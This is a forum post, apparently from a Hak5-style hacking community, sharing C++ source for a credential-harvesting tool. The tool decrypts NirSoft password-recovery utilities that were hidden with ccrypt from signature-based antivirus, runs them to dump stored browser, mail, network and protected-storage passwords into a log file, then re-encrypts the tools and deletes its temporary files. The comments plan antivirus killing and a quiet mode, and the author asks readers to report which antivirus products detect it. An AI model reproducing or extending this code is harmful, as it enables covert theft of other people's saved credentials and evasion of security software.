Here is the source using a small payload from the great folks at Nirsoft. Still a lot of work to do to finish the final program, but I'll have more time over the holidays with no work or classes to hack up some code. I may start a new thread for my own payload since this is becoming a beast of its own. This code assumes you have ccrypt in the current executing directory. Although the encrypted files should scan clean for signature based AVs(please provide feedback), once they are ran, AVs will catch the process. Also, you should manually encrypt the payload files first before running this code.
/*
* AUTHOR: hexlax
*
* The encryption handling of this program is done. Please
* give me feedback if any AVs catch it.
*
* Command line options for final product(not implemented now):
* a) -q quiet mode, nothing displays to screen
* b) -f force run anyways
* i) if local admin privs not present
* ii) if AV is detected and forced stop failed
* iii) Places payload in danger of AV removal
* c) -c config file path [optional - default presumed]
* i) payload list
* ii) utilities list (ccrypt, pskill, etc.)
* d) -k only attempt to kill AV, no payload run
*
* The final product should be scalable enough for a user
* to add/delete/modify the payload by editing the config file.
*
*/
#include "stdafx.h"
#include <iostream>
#include <string>
#include <stdlib.h>
using namespace std;
//global constants
const string PAYLOAD_FILEPATH = "tools"; //TODO: insert user pref from config file.
const string ENC_KEY = "hexlax@hak5"; //TODO: insert user pref from config file.
void decrypt()
{
cout << "Decrypting payload...n";
string syscall = "ccrypt -d -K " + ENC_KEY + " -r " + PAYLOAD_FILEPATH;
system(syscall.c_str());
return;
}
void encrypt(){
cout << "Encrypting payload back...n";
string syscall = "ccrypt -e -K " + ENC_KEY + " -q -r " + PAYLOAD_FILEPATH;
system(syscall.c_str());
return;
}
void run_payload(){
string syscall;
cout << "Running Payload:";
//IEPV.EXE
cout << ".PSPV..";
syscall = PAYLOAD_FILEPATH + "iepv /stext iepv.tmp";
system(syscall.c_str());
//MSPASS.EXE
cout << ".MSPASS...";
syscall = PAYLOAD_FILEPATH + "mspass /stext mspass.tmp";
system(syscall.c_str());
//NETPASS.EXE
cout << ".NETPASS..";
syscall = PAYLOAD_FILEPATH + "netpass /stext netpass.tmp";
system(syscall.c_str());
//PSPV.EXE
cout << ".PSPV..";
syscall = PAYLOAD_FILEPATH + "pspv /stext pspv.tmp";
system(syscall.c_str());
//END PAYLOAD
cout << "n";
return;
}
void cleanup_temps(){
string syscall = "";
cout << "Cleaning up...n";
//consolidate our tmp files in to one
//TODO: implement the user's preference here for a
//file name & program list from config file
//TODO: after list file is done, use a for statement for cleaner code
cout << "Saving output to log.txt...n";
syscall = "type iepv.tmp >> log.txt";
system(syscall.c_str());
syscall = "type mspass.tmp >> log.txt";
system(syscall.c_str());
syscall = "type netpass.tmp >> log.txt";
system(syscall.c_str());
syscall = "type pspv.tmp >> log.txt";
system(syscall.c_str());
//get rid of *.tmp files
cout << "Removing temp files...n";
syscall = "del *.tmp";
system(syscall.c_str());
}
int main(){
decrypt();
run_payload();
encrypt();
cleanup_temps();
cout << "Scan Complete!n";
return 0;
}